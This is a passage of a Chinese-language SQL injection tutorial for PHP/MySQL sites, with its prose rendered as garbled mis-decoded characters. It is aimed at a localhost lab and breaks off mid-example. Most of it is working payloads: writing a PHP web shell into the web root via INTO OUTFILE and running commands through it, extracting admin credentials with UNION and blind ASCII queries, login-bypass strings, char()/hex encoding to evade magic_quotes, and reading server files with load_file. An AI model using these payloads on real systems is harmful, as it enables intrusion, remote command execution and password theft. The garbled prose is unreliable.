) ENGINE=MyISAM DEFAULT CHARSET=latin1;

#
# µ¼³öÏÂÃæµÄÊý¾Ý¿âÄÚÈÝ `test`
#

INSERT INTO test VALUES ('<?php system($cmd); ?>', NULL);

ÒÑÖªÎÒµÄÍøվ·¾¶ÔÚC:/apache/htdocs/site/
ºÃ£¬¿´Äã±íÑÝŶ£¬ÊäÈë
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,a,4,5,6,7,8,9,10,11%20from%20test%20into%20outfile%20'C:/apache/htdocs/site/cmd.php'
Òâ˼¾ÍÊǰѱíÀïµÄaÁÐÄÚÈݵ¼³öµ½cmd.phpzhong
¿´¿´cmd.phpÀïµÄÄÚÈÝÏÈ
1 2 <?php system($cmd); ?> 0000-00-00 00:00:00 5 6 7 8 9 10 11
ÎÒÃÇÖ´ÐÐһϿ´¿´ÏÈ
http://localhost/site/cmd.php?cmd=dir
Èçͼ(10)


¹þ¹þ£¬¹ûÈ»ºÜˬŶ£¡
4£©ÏÂÃæ¸ø´ó¼Ò½²ÊöLOAD DATA INFILEµÄ¹ÊÊÂ

LOAD DATA [LOW_PRIORITY] [LOCAL] INFILE 'file_name.txt' [REPLACE | IGNORE] INTO TABLE tbl_name

LOAD DATA INFILEÓï¾ä´ÓÒ»¸öÎı¾ÎļþÖÐÒԺܸߵÄËٶȶÁÈëÒ»¸ö±íÖС£
ÒòΪÕâ¸öÓï¾äÒ»°ãÇé¿öϲ»ÄÜÔÚä¯ÀÀÆ÷ÀïÖ±½ÓÊäÈ룬ËùÒÔ×÷Óò»ÊǺܴó¡£

ÕâÀï¾Ù¸öÀý×ÓÀ´ËµËµ
±ítestµÄ½á¹¹ºÍÉÏÃæ½éÉܵÄÒ»Ñù

#
# Êý¾Ý±íµÄ½á¹¹ `test`
#

CREATE TABLE test (
a text,
b text
) ENGINE=MyISAM DEFAULT CHARSET=latin1;


ÎÒÃÇÔÚmysqlÃüÁîÐÐÏÂÊäÈ룺
Mysql>load data infile 'c:/cmd.php' into table test

ÆäÖÐc:/cmd.phpÄÚÈÝΪ
<?php system($cmd); ?>
×¢Ò⣺ÉÏÃæµÄÄÚÈÝдÔÚÒ»ÐÐÀïŶ¡£
ͨ¹ýÉÏÃæµÄÖ¸ÁîÎÒÃǾͰÑcmd.aspµÄÄÚÈÝÊäÈëµ½ÁËtest±íÖÐ
ËùµÃ½á¹ûÈçͼ£¨11£©

ʵ¼ÊÉϵõ½µÄ¾ÍÊÇÉϸöÀý×Ótest±íÖеÄÄÚÈÝ£¡¿´¿´£¬ÔÙ½áºÏinto outfile£¬ÊDz»ÊÇÒ»¸öÍêÃÀµÄ×éºÏÄØ¡£
»ù±¾µÄÓï·¨¾Í½«µ½ÕâÀïÁË£¬¿ÉÄÜ»¹ÓкܶàÖØÒªµÄ¶«Î÷©µôÁËŶ£¬Äã¿ÉÒÔÈ¥phpÖÐÎÄÊÖ²áÀïÌÔ½ð£¬ÏàÐÅÄãÒ»¶¨»áÕÒµ½ºÜ¶àºÃ¶«Î÷µÄ£¬×Ô¼ºÍÚ¾ò°É¡££¨Ëæ¹âÅÌÎÒÃǸ¶ÉÏÒ»¸öphpÖÐÎÄÊֲᣩ

B:´Ó×¢È뷽ʽÉÏ
Ö÷ÒªÓÐÊý×ÖÐÍ£¬×Ö·ûÐͺÍËÑË÷Àà
1. Êý×ÖÐÍ
ºÜ³£¼ûÁË£¬ÎÒÃÇÉÏÃæ¾ÙµÄ¾ÍÒ»Ö±ÊÇ×Ö·ûÐ͵ÄÀý×Ó£¬´ó¼ÒÓ¦¸Ã»¹¶¼¼ÇµÃaspÏÂÈçºÎÆƹÜÀíÔ±ÃÜÂ룬ÏÂÃæÎÒÃÇÀ´¿´Ò»ÏÂphpÏÂÈçºÎʵÏÖ
ÎÒÃÇÔÚµØÖ·À¸ÊäÈ룺
http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor)
ÅжÏÊÇ·ñ´æÔÚalphaauthor£¬Èç¹ûÓзµ»ØÕý³£Ò³Ã棨һ°ãÇé¿öÀ²£¬ÓеÄʱºòÒ²·µ»ØÆäËüʲôµÄ£¬ÕâÖ÷Òª¸ù¾Ý¹¹Ôì1£½1 ºÍ1£½2ʱµÄÒ³ÃæÅжϣ©

http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20length(username)=5)
ÅжÏÊÇ·ñusername×ֶεij¤¶ÈΪ5

http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20length(username)=5%20and%20length(password)=32)
¸úÉÏÃæ²î²»¶àÀ²£¬ÅжÏpassword×ֶεij¤¶È

ÏÂÃæ½øÈë²ÂÃÜÂëµÄ½×¶Î£¬ÓÃascii·½·¨À´Ò»Î»Ò»Î»²Â²â°É¡£AsciiµÈͬÓÚaspϵÄasc£¬¹þ¹þ£¬¾­³£¿´ºÚ¿ÍXµµ°¸µÄÒ»¶¨ºÜÇå³þÀ²¡£
http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20ascii(mid(username,1,1))=97)
Óû§ÃûµÚһλŶascii97¾ÍÊÇ×Ö·ûaÀ²

http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20ascii(mid(username,2,1))=108)
µÚ¶þλÀ²£¬ÕâÀïÖ»·ÅÕâÒ»¸öͼÀ²£¬Èçͼ£¨12£©


ÏÂÃæÊ¡ÂÔXÌõ¡£
·´ÕýÎÒÃÇ×îºóÊǵóöÓû§ÃûºÍÃÜÂëÁË¡£
ÎÒÃǻᷢÏÖÕâÀïµÄ×¢Èë·½·¨¼¸ºõºÍaspϵÄ×¢ÈëÊÇÒ»ÑùµÄ£¬¾ÍÊÇ°Ñasc±ä³Éascii£¬°Ñlen±ä³Élength¾Í¿ÉÒÔÁË£¬×îºóÎÒÃǾͿÉÒԵõ½ºǫ́µÄ¹ÜÀíÔ±Õ˺źÍÃÜÂ룬
µ±È»ÎÒÃÇÓиü¼òµ¥µÄ·½·¨£¬¿ÉÒÔÖ±½ÓÓÃunionµÄ·½·¨Ö±½ÓµÃµ½

http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,username,password,4,5,6,7,8,9,10,11%20from%20alphaauthor
Èçͼ£¨13£©

Õ˺ÅÊÇalpha£¬ÃÜÂëÊÇÒ»³¤´®µÄ¶«¶«£¬¹þ¹þ£¬¼òµ¥Ã÷ÁË£¬¿´µ½Ã»ÓУ¬ÕâÀïÏÔʾ³öÁËunion selectµÄÇ¿´óÍþÁ¦ÁË°É¡£

ÉÏÃæ½²µÄÊÇÔÚ²»Í¨µÄ±íÀïÃæ²Â²âÄÚÈÝ£¬Èç¹ûÔÚͬһ¸ö±íÀïÃæÎÒÃÇ»¹¿ÉÒÔÏñÏÂÃæÕâÑùÁ¨£º
ÏÂÃæµÄÒ»¶Î´úÂë¸ù¾ÝÓû§idÏÔʾÓû§ÐÅÏ¢

<?php
//user.php
¡­¡­¡­..
$sql = "SELECT * FROM user WHERE id=$id";
¡­¡­¡­¡­

if (!$result)
{
echo "wrong";
exit;
}
else
echo "Óû§ÐÅÏ¢";
?>

²Â²â·½·¨ºÍÉÏÃ漸ºõÊÇÒ»ÑùµÄ£¬¾ÍÊÇÎÒÃDz»ÓÃÔÙÓÃselectÁË¡£
ÎÒÃÇÊäÈë
http://localhost/user.php?id=1 and length(password)=7
ÏÔʾÓû§ÐÅϢ˵Ã÷ÎÒÃDzµÄÕýÈ·£¬ºÇºÇ£¬comeon

http://localhost/user.php?id=1 and ascii(mid(password,1,1))=97
µÚһλÃÜÂë
http://localhost/user.php?id=1 and ascii(mid(password,2,1))=97
µÚ¶þλŶ£¬

ͨ¹ýÕâÖÖ·½·¨×îÖÕÎÒÃÇÒ²¿ÉÒԵóöid=1µÄÓû§µÄÕ˺ÅÃÜÂë

2. ÏÂÃæÎÒÃÇÀ´¿´¿´×Ö·ûÐ͵Ä×¢È뷽ʽ
ÔÚaspÖÐ×Ö·ûÐ͵Ä×¢È뷽ʽºÜÁé»î£¬ÔÚphpÖÐ×Ö·ûÐ͵Ä×¢Èë¾ÍÖ÷ÒªÔÚ
magic_quotes_gpc£½OffµÄÇé¿öϽøÐÐÁË¡££¨³ý·ÇÓÐÁíÍâÒ»ÖÖÇé¿ö£¬ÏȲ»¸æËßÄ㣩

ÀýÈ磺
<?php
//display.php
¡­¡­
$query="select * from alphadb where id=¡¯¡±.$id.¡±¡¯";
¡­¡­¡­¡­..
?>
ÕâÑùid¾Í±ä³É×Ö·ûÐ͵ÄÁË¡£
²»ÖªµÀ´ó¼Ò·¢ÏÖûÓУ¬¼ÙÈçÎÒÃÇÕâÑùд³ÌÐòµÄ»°£¬°²È«ÐÔ»áÓÐËùÌá¸ßµÄŶ
ºÇºÇ£¬¼ÌÐøÁË
ºÃÎÒÃǼìÑéÊÇ·ñÓÐ×¢ÈëÏÈ
http://localhost/site/display.php?id=451' and 1=1 and ¡®¡¯=¡¯
http://localhost/site/display.php?id=451' and 1=2 and ¡®¡¯=¡¯
´øÈëµ½sqlÓï¾äÀï¾ÍÊÇ
select * from alphadb where id=¡¯451¡¯and 1=1 and ¡®¡¯=¡¯¡¯
select * from alphadb where id=¡¯451¡¯and 1=2 and ¡®¡¯=¡¯¡¯

Èç¹ûÄã·¢ÏÖÒ³ÃæÐÅÏ¢²»Í¬µÄ»°ËµÃ÷©¶´´æÔÚŶ
»òÕß
http://localhost/site/display.php?id=451' and 1=1 %23
http://localhost/site/display.php?id=451' and 1=2 %23
%23ת»¯ÒÔºó¾ÍÊÇ#£¬¼´×¢Ê͵ÄÒâ˼£¬ÉÏÃæ˵¹ýÁËŶ
ÕâÑùµÄ»°¾Í²»Óÿ¼ÂÇÄǸöÒýºÅµÄ±ÕºÏÎÊÌâÁË£¬Êµ¼ÊºÜ¶àʱºòÎÒÃÇÍƼöÕâÖÖ·½·¨¡£
°ÑËü´øÈëµ½sqlÓï¾äÀï¾Í³ÉÁË
select * from alphadb where id=¡¯451¡¯and 1=1 #¡¯
ÕýÊÇÎÒÃÇÏëÒªµÄŶ£¡
¿´¿´Ð§¹û°É£¬
http://localhost/site/display.php?id=451' and 1=1 %23
ͼ£¨14£©

Õý³£ÏÔʾÁËß½£¡

http://localhost/site/display.php?id=451' and 1=2 %23
ͼ£¨15£©


ÏÔʾ²»Õý³££¬¹þ¹þ£¬ËµÃ÷ÎÊÌâ´æÔÚ
ÎÒÃǼÌÐøŶ£º
http://localhost/site/display.php?id=451¡¯%20and%201=2%20%20union%20select%201,username,password,4,5,6,7,8,9,10,11%20from%20alphaauthor%23
¿´Í¼£¨16£©

Ok,Óû§ÃûºÍÃÜÂëÓÖ³öÀ´ÁËŶ£¡
3. ´ó¼ÒÒ»ÆðÀ´¿´¿´ËÑË÷ÐÍ×¢Èë°É
ËÑË÷Ð͵ÄÓï¾äÒ»°ãÕâÑùд
<?php
//search.php
¡­¡­
$query="select * from alphadb where title like '%$title%';
¡­¡­¡­¡­..
?>
²»ÖªµÀ´ó¼Ò»¹ÊÇ·ñ¼ÇµÃaspÀïµÄ×¢ÈëÄØ£¿
²»¹ý²»¼ÇµÃҲûÓйØϵµÄÀ²£¬ÎÒÃÇ¿´°É¡£
ÎÒÃǹ¹½¨×¢ÈëÓï¾ä°É
ÔÚÊäÈë¿òÊäÈë
a%' and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from alphaauthor#·Åµ½sqlÓï¾äÖгÉÁË

select * from alphadb where title like '%a%' and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from alphaauthor# %'
½á¹ûÈçͼ17Ŷ

ÔõôÑù£¬³öÀ´ÁË°É£¬¹þ¹þ£¬Ò»Çо¡ÔÚÕÆÎÕÖ®ÖС£

C£ºÏÂÃæÎÒÃÇ´Ó×¢ÈëµØµãÉÏÔÚÀ´¿´Ò»Ï¸÷ÖÖ×¢Èë¹¥»÷·½Ê½
1) Ê×ÏÈÀ´¿´¿´ºǫ́µÇ½Ŷ
´úÂëÏÈ
<?php
//login.php
¡­¡­.
$query="select * from alphaauthor where UserName='"
.$HTTP_POST_VARS["UserName"]."' and
Password='". $HTTP_POST_VARS["Password"]."'";
$result=mysql_query($query);
$data=mysql_fetch_array($result);
if ($data)
{
echo ¡°ºǫ́µÇ½³É¹¦¡±;
}
esle
{
echo ¡°ÖØеǽ¡±£»
exit£»
£ý

¡­¡­¡­
?>
UsernameºÍpasswordûÓо­¹ýÈκδ¦ÀíÖ±½Ó·Åµ½sqlÖÐÖ´ÐÐÁË¡£
¿´¿´ÎÒÃÇÔõôÈƹýÄØ£¿
×î¾­µäµÄ»¹ÊÇÄǸö£º
ÔÚÓû§ÃûºÍÃÜÂë¿òÀﶼÊäÈë
¡®or¡¯¡¯=¡¯
´øÈësqlÓï¾äÖгÉÁË
select * from alphaauthor where UserName=¡¯¡¯or¡¯¡¯=¡¯¡¯ and Password=¡¯¡¯or¡¯¡¯=¡¯¡¯
ÕâÑù´øÈëµÃµ½µÄ$data¿Ï¶¨ÎªÕ棬Ҳ¾ÍÊÇÎÒÃdzɹ¦µÇ½ÁË¡£
»¹ÓÐÆäËûµÄÈƹý·½·¨£¬Ô­ÀíÊÇÒ»ÑùµÄ£¬¾ÍÊÇÏë°ì·¨ÈÃ$data·µ»ØÊÇÕæ¾Í¿ÉÒÔÁË¡£
ÎÒÃÇ¿ÉÒÔÓÃÏÂÃæµÄÕâЩÖз½·¨Å¶
1.
Óû§ÃûºÍÃÜÂ붼ÊäÈ롯or¡¯a¡¯=¡¯a
Sql³ÉÁË
select * from alphaauthor where UserName=¡¯¡¯or¡¯a¡¯=¡¯a¡¯ and Password=¡¯¡¯or¡¯a¡¯=¡¯a¡¯

2.
Óû§ÃûºÍÃÜÂ붼ÊäÈ롯or 1=1 and ¡®¡¯=¡¯
Sql³ÉÁË
select * from alphaauthor where UserName=¡¯ ¡¯or 1=1 and ¡®¡¯=¡¯¡¯ and Password=¡¯ ¡¯or 1=1 and ¡®¡¯=¡¯¡¯
Óû§ÃûºÍÃÜÂ붼ÊäÈ롯or 2>1 and ¡®¡¯=¡¯
Sql³ÉÁË
select * from alphaauthor where UserName=¡¯ ¡¯or 2>1 and ¡®¡¯=¡¯¡¯ and Password=¡¯ ¡¯or 2>1 and ¡®¡¯=¡¯¡¯

3.
Óû§ÃûÊäÈ롯or 1=1 # ÃÜÂëËæ±ãÊäÈë
Sql³ÉÁË
select * from alphaauthor where UserName=¡¯ ¡¯or 1£½1 # and Password=¡¯anything¡¯
ºóÃ沿·Ö±»×¢Ê͵ôÁË£¬µ±È»·µ»Ø»¹ÊÇÕæŶ¡£
4.
¼ÙÉèadminµÄid£½1µÄ»°ÄãÒ²¿ÉÒÔ

Óû§ÃûÊäÈ롯or id£½1 # ÃÜÂëËæ±ãÊäÈë
Sql³ÉÁË
select * from alphaauthor where UserName=¡¯ ¡¯or id£½1 # and Password=¡¯anything¡¯
Èçͼ18

¿´¿´Ð§¹ûͼ19


ÔõôÑù£¿Ö±½ÓµÇ½ÁËŶ£¡

Ë×»°ËµµÄºÃ£¬Ö»ÓÐÏë²»µ½Ã»ÓÐ×ö²»µ½¡£
»¹Óиü¶àµÄ¹¹Ôì·½·¨µÈ×ſκó×Ô¼ºÏëÀ²¡£

2£©µÚ¶þ¸ö³£ÓÃ×¢ÈëµÄµØ·½Ó¦¸ÃËãÊÇǰ̨×ÊÁÏÏÔʾµÄµØ·½ÁË¡£
ÉÏÃæÒѾ­¶à´ÎÌáµ½ÁËѽ£¬¶øÇÒÉæ¼°ÁËÊý×ÖÐÍ£¬×Ö·ûÐ͵ȵȣ¬ÕâÀï¾Í²»ÔÙÖظ´Á˹þ¡£
Ö»ÊǾٸöÀý×ӻعËÒ»ÏÂ
±Ìº£³±ÉùÏÂÔØÕ¾ - v2.0.3 liteÓÐ×¢È멶´£¬´úÂë¾Í²»ÔÙÁгöÀ´ÁË
Ö±½Ó¿´½á¹û
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users
Èçͼ20

¿´¿´£¬ÎÒÃÇÓֵõ½ÎÒÃÇÏëÒªµÄÁË
̞alpha
ÃÜÂëÒ»³¤´®¡£
ΪʲôÎÒÃÇÒª°Ñpassword·ÅÔÚ3×ֶ䦣¬°Ñusername·ÅÔÚ5×ֶδ¦ÁË£¬ÎÒÃÇÉÏÃæÒѾ­Ìá¹ýÁËŶ£¬¾ÍÊÇÎÒÃDz²â3ºÍ5¶ÎÏÔʾµÄÓ¦¸ÃÊÇ×Ö·û´®ÐÍ£¬¶øÓëÎÒÃÇÒªÏÔʾµÄusernameºÍpasswordµÄ×Ö¶ÎÀàÐÍÓ¦¸ÃÏàͬ£¬ËùÒÔÎÒÃÇÕâÑù·ÅÁËŶ¡£
ΪʲôҪÓÃ18¸ö×Ö¶ÎÄØ£¿²»ÖªµÀ´ó¼Ò»¹ÊÇ·ñ¼ÇµÃÔÚunion select½éÉÜÄÇÀïÎÒÃÇÌáµ½union±ØÐëÒªÇóÇ°ºóselectµÄ×Ö¶ÎÊýÏàͬ£¬ÎÒÃÇ¿ÉÒÔͨ¹ýÔö¼ÓselectµÄ¸öÊýÀ´²Â²âµ½ÐèÒª18¸ö×ֶΣ¬Ö»ÓÐÕâÑùunion selectµÄÄÚÈݲŻáÕý³£ÏÔʾŶ£¡
3)ÆäËüÈç×ÊÁÏÐ޸ģ¬Óû§×¢²áµÄµØ·½Ö÷ÒªµÃÓÐÓû§µÈ¼¶µÄÓ¦Óá£
ÎÒÃÇÔÚÉÏÃæ½²ÊöupdateºÍinsertµÄʱºò¶¼ÒѾ­½²µ½£¬ÒòΪ²»ÊǺܳ£Óã¬ÕâÀï¾Í²»ÔÙ²ûÊö£¬ÔÚÏÂÃ潫»áÌᵽһЩ¹ØÓÚupdateºÍinsertµÄ¸ß¼¶ÀûÓü¼ÇÉ¡£
¶þ£ºÏÂÃ潫Ҫ½øÈëmagic_quotes_gpc£½OnʱºòµÄ×¢Èë¹¥»÷½Ìѧ»·½ÚÁË
µ±magic_quotes_gpc£½OnµÄʱºò£¬½»µÄ±äÁ¿ÖÐËùÓÐµÄ ' (µ¥ÒýºÅ),
¡° (Ë«ÒýºÅ), \ (·´Ð±Ïß) ºÍ ¿Õ×Ö·û»á×Ô¶¯×ªÎªº¬Óз´Ð±ÏßµÄתÒå×Ö·û¡£
Õâ¾Íʹ×Ö·ûÐÍ×¢ÈëµÄ·½·¨»¯ÎªÅÝÓ°£¬ÕâʱºòÎÒÃǾÍÖ»ÄÜ×¢ÈëÊý×ÖÐÍÇÒûÓÐ
Intval()´¦ÀíµÄÇé¿öÁË£¬Êý×ÖÐ͵ÄÎÒÃÇÒѾ­½²Á˺ܶàÁËÊÇ°É£¬ÓÉÓÚÊý×ÖÐÍûÓÐÓõ½µ¥ÒýºÅ×ÔÈ»¾ÍûÓÐÈƹýµÄÎÊÌâÁË£¬¶ÔÓÚÕâÖÖÇé¿öÎÒÃÇÖ±½Ó×¢Èë¾Í¿ÉÒÔÁË¡£
1£©¼ÙÈçÊÇ×Ö·ûÐ͵ľͱØÐëµÃÏñÏÂÃæÕâ¸öÑù×Ó£¬Ã»ÓÐÔÚ×Ö·ûÉϼÓÒýºÅ ¡£

ÕâÀïÎÒÃÇÒªÓõ½Ò»Ð©×Ö·û´®´¦Àíº¯ÊýÏÈ£¬
×Ö·û´®´¦Àíº¯ÊýÓкܶ࣬ÕâÀïÎÒÃÇÖ÷Òª½²ÏÂÃæµÄ¼¸¸ö£¬¾ßÌå¿ÉÒÔ²ÎÕÕmysqlÖÐÎIJο¼ÊÖ²á7.4.10¡£

char() ½«²ÎÊý½âÊÍΪÕûÊý²¢ÇÒ·µ»ØÓÉÕâЩÕûÊýµÄASCII´úÂë×Ö·û×é³ÉµÄÒ»¸ö×Ö·û´®¡£
µ±È»ÄãÒ²¿ÉÒÔÓÃ×Ö·ûµÄ16½øÖÆÀ´´úÌæ×Ö·û£¬ÕâÑùÒ²¿ÉÒԵģ¬·½·¨¾ÍÊÇÔÚ16½øÖÆÇ°Ãæ¼Ó0x£¬¿´ÏÂÃæµÄÀý×Ó¾ÍÃ÷°×ÁË¡£

<?php
//login.php
¡­¡­
$query="select * from ".$art_system_db_table['user']."
where UserName=$username and Password='".$Pw."'";
¡­¡­
?>

¼ÙÉèÎÒÃÇÖªµÀºǫ́µÄÓû§ÃûÊÇalpha
ת»¯³ÉASCIIºóÊÇchar(97,108,112,104,97)
ת»¯³É16½øÖÆÊÇ0x616C706861
£¨ÎÒÃǽ«ÔÚ¹âÅÌÖÐÌṩ16½øÖƺÍasciiת»»¹¤¾ß£©
ºÃÁËÖ±½ÓÔÚä¯ÀÀÆ÷ÀïÊäÈ룺

http://localhost/site/admin/login.php?username=char(97,108,112,104,97)%23
sqlÓï¾ä±ä³É£º

select * from alphaAuthor where UserName=char(97,108,112,104,97)# and Password=''
Èçͼ21

ÕýÈçÎÒÃÇÆÚÍûµÄÄÇÑù£¬Ëû˳ÀûÖ´ÐÐÁË£¬ÎÒÃǵõ½ÎÒÃÇÏëÒªµÄ¡£
µ±È»¿©£¬ÎÒÃÇÒ²¿ÉÒÔÕâÑù¹¹Ôì
http://localhost/site/admin/login.php?username=0x616C706861%23
sqlÓï¾ä±ä³É£º
select * from alphaAuthor where UserName=0x616C706861%23# and Password=''
ÎÒÃÇÔÙÒ»´ÎÊdzɹ¦ÕßÁË¡£ºÜÓгɾ͸аɣ¬

»òÐíÄã»áÎÊÎÒÃÇÊÇ·ñ¿ÉÒÔ°Ñ#Ò²·ÅÔÚchar()Àï
ʵ¼ÊÉÏchar(97,108,112,104,97)Ï൱ÓÚ¡¯alpha¡¯
×¢ÒâÊÇalphaÉϼÓÒýºÅ£¬±íʾalpha×Ö·û´®¡£
ÎÒÃÇÖªµÀÔÚmysqlÖÐÈç¹ûÖ´ÐÐ

mysql> select * from dl_users where username=alpha;
ERROR 1054 (42S22): Unknown column 'alpha' in 'where clause'
¿´·µ»Ø´íÎóÁË¡£ÒòΪËû»áÈÏΪalphaÊÇÒ»¸ö±äÁ¿¡£ËùÒÔÎÒÃǵÃÔÚalphaÉϼÓÒýºÅ¡£
ÈçÏÂ
mysql> select * from dl_users where username='alpha';
ÕâÑù²ÅÊÇÕýÈ·µÄ¡£
Èç¹ûÄã°Ñ#ºÅÒ²·Åµ½ÄÇÀïÈ¥ÁË£¬¾Í³ÉÁË¡¯alpha#¡¯
´øÈësqlÓï¾äÖÐ
select * from dl_users where username='alpha#';
µ±È»ÊÇʲôҲûÓÐÁË£¬ÒòΪÁ¬alpha#Õâ¸öÓû§¶¼Ã»ÓС£
ºÃ£¬ÏÂÃæÎÒÃÇÔÙÀ´¿´¸öÀý×Ó£¬

<?php
//display.php
¡­¡­
$query="select * from ".$art_system_db_table['article']."
where type=$type;
¡­¡­
?>

´úÂë¸ù¾ÝÀàÐÍÀ´ÏÔʾÄÚÈÝ£¬$typeûÓÐÈκιýÂË£¬ÇÒûÓмÓÒýºÅ·ÅÈë³ÌÐòÖС£
¼ÙÉètypeÖк¬ÓÐxiaohuaÀ࣬xiaohuaµÄchar()ת»»ºóÊÇ
char(120,105,97,111,104,117,97)

ÎÒÃǹ¹½¨
http://localhost/display.php?type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
´øÈësqlÓï¾äÖÐΪ£º
select * from ".$art_system_db_table['article']."
where type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
¿´¿´£¬ÎÒÃǵÄÓû§ÃûºÍÃÜÂëÕÕÑù³öÀ´ÁËŶ£¡Ã»ÓнØͼ£¬ÏëÏñһϿ©£ºP

2) »òÐíÓÐÈË»áÎÊ£¬ÔÚmagic_quotes_gpc£½OnµÄÇé¿öϹ¦ÄÜÇ¿´óµÄload_file()»¹Äܲ»ÄÜÓÃÄØ£¿
ÕâÕýÊÇÎÒÃÇÏÂÃæÒª½«µÄÎÊÌâÁË£¬load_file()µÄʹÓøñʽÊÇload_file(¡®Îļþ·¾¶¡¯)
ÎÒÃÇ·¢ÏÖÖ»Òª°Ñ¡®Îļþ·¾¶¡¯×ª»¯³Échar()¾Í¿ÉÒÔÁË¡£ÊÔÊÔ¿´Å¶
load_file(¡®c:/boot.ini¡¯)ת»¯³É
load_file(char(99,58,47,98,111,111,116,46,105,110,105))
ͼ22

·Åµ½¾ßÌå×¢ÈëÀï¾ÍÊÇ
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,load_file(char(99,58,47,98,111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
¿´Í¼23

¿´¿´£¬ÎÒÃÇ¿´µ½ÁËboot.iniµÄÄÚÈÝÁËŶ¡£
ºÜ¿ÉϧµÄÊÇinto outfile¡¯¡¯ ²»ÄÜÈƹý£¬²»È»¾Í¸üˬÁË¡£µ«ÊÇ»¹ÊÇÓÐÒ»¸öµØ·½¿ÉÒÔʹÓÃselect * from table into outfile¡¯¡¯ ÄǾÍÊÇ¡­.£¨ÏÈÂô¸ö¹Ø×Ó£¬ÏÂÃæ»á¸æËßÄ㣩
Èý£ºÒ»Ð©×¢Èë¼¼ÇÉ£¬ºÜ¶à¶¼ÊǸöÈË·¢ÏÖŶ
1.union selectµÄ¼¼ÇÉ
UNION ÓÃÓÚ½«¶à¸ö SELECT Óï¾äµÄ½á¹ûÁªºÏµ½Ò»¸ö½á¹û¼¯ÖС£ÔÚ SELECT ÖÐµÄ select_expression ²¿·ÖÁгöµÄÁбØÐë¾ßÓÐͬÑùµÄÀàÐÍ¡£µÚÒ»¸ö SELECT ²éѯÖÐʹÓõÄÁÐÃû½«×÷Ϊ½á¹û¼¯µÄÁÐÃû·µ»Ø¡£
È»¶øÓÐÎÒÃÇ¿ÉÒÔÓÃÏÂÃæµÄ·½·¨À´²Â²âÁеÄÀàÐÍ£¬¿ÉÊÇÊ¡È¥ºÜ¶àʱ¼ä
ÎÒÃÇÏÈ
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
ͼ24

¿´¿´Èí¼þÃèÊöÀïд×Å3£¬×÷ÕßÀïд×Å4£¬ÎÒÃǾͿÉÒԲ²â3ºÍ4µÄλÖÃÊÇ×Ö·ûÐ͵ģ¬ÎÒÃÇÔÙ¿´14Ç°ÃæµÄÊÇÏÂÔØ´ÎÊý£¬Õâ¾ÍÓ¦¸ÃÊÇintÐ͵ÄÁË£¬¶Ô°É¡£
ºÃÁË£¬ÎÒÃǸù¾ÝÕâÀïÀ´¹¹½¨°É£¬¹À¼ÆusernameºÍpasswordÒ²ÊÇ×Ö·ûÐ͵ġ£
ÊÔÊÔ¿´Å¶
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users
Èçͼ25

¹þ¹þ£¬ÕâÖÖ·½·¨Ö»Òª¿´¿´¾Í¿ÉÒÔ´ó¸Å²Âµ½ÁË¡£
2.load_file¶ÁдÎļþµÄ¼¼ÇÉ
²»ÖªµÀÄãÓÐûÓз¢ÏÖ¹ýÔÚÎÒÃÇÓÃload_file()¶ÁдphpÎļþʱ²»ÄÜÔÚÍøÒ³ÖÐÏÔʾ¡£ÀýÈ磺
'C:/apache/htdocs/site/lib/sql.inc.php'ת»¯Îª16½øÖÆΪ£º0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870
ÎÒÃǹ¹ÔìÈçÏÂ
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870),4,5,6,7,8,9,10,11
Èçͼ26

·¢ÏÖÔÚÎÄÕÂÄÚÈݵĵط½±¾À´¸ÃÏÔʾsql.inc.phpµÄ£¬¿ÉÊÇÈ´¿Õ¿ÕÖ®£¬ÎªºÎÄØ£¿
ÎÒÃÇ¿´¿´ÍøÒ³µÄÔ´´úÂëÏÈ
ͼ27

¹þ¹þ£¬¿´¿´±ê¼ÇµÄµØ·½£¬ÔÎËÀ£¬Ô­À´ÔÚÕâÀï°¡£¬¿ÉÊÇΪʲôÁ¨£¿
Ô­À´htmlÖÐ< >ÓÃÓÚ±ê×¢£¬¹þ¹þ£¬Ã÷°×ÁË°É£¡Ï´οɵüǵÃÔÚÄÄÀïÕÒŶ¡£
4. md5µÄ¶ñÃÎ
ɽ¶«´óѧµÄÍõ²©Ê¿×î½ü¿ÉÊǸãmd5¸ãµÄºì͸ÁË£¬ÎÒÃÇÒ²À´¸ãÒ»¸ã°É£¬ÎÒÃDZÈËû¸üˬ£¬²»ÓüÆË㣬¹þ¹þ¡£
md5ÎÒÃÇÊÇÓа취ÈƹýµÄ£¬µ«ÊDz¢²»ÊÇÄÄÀﶼ¿ÉÒÔ£¬phpÖеÄmd5º¯Êý¾Í²»ÄÜÈƹý£¬ÒòΪÄãÊäÈëµÄËùÓж«Î÷¶¼ÔÚÀïÃ棬¸ù±¾Åܲ»³ö¡£¿ÉÒÔÈƹýµÄÊÇsqlÓï¾äÖеÄmd5¡£µ±È»±ðµÄsqlÖеĺ¯ÊýÒ²ÊÇ¿ÉÒÔÈƹýµÄ£¬µÀÀíÏàͬŶ¡£
¿´Àý×ÓÏÈ£º
<?php
//login.php
¡­¡­
$query="select * from alphaauthor where UserName=md5($username) and Password='".$Pw."'";
¡­¡­
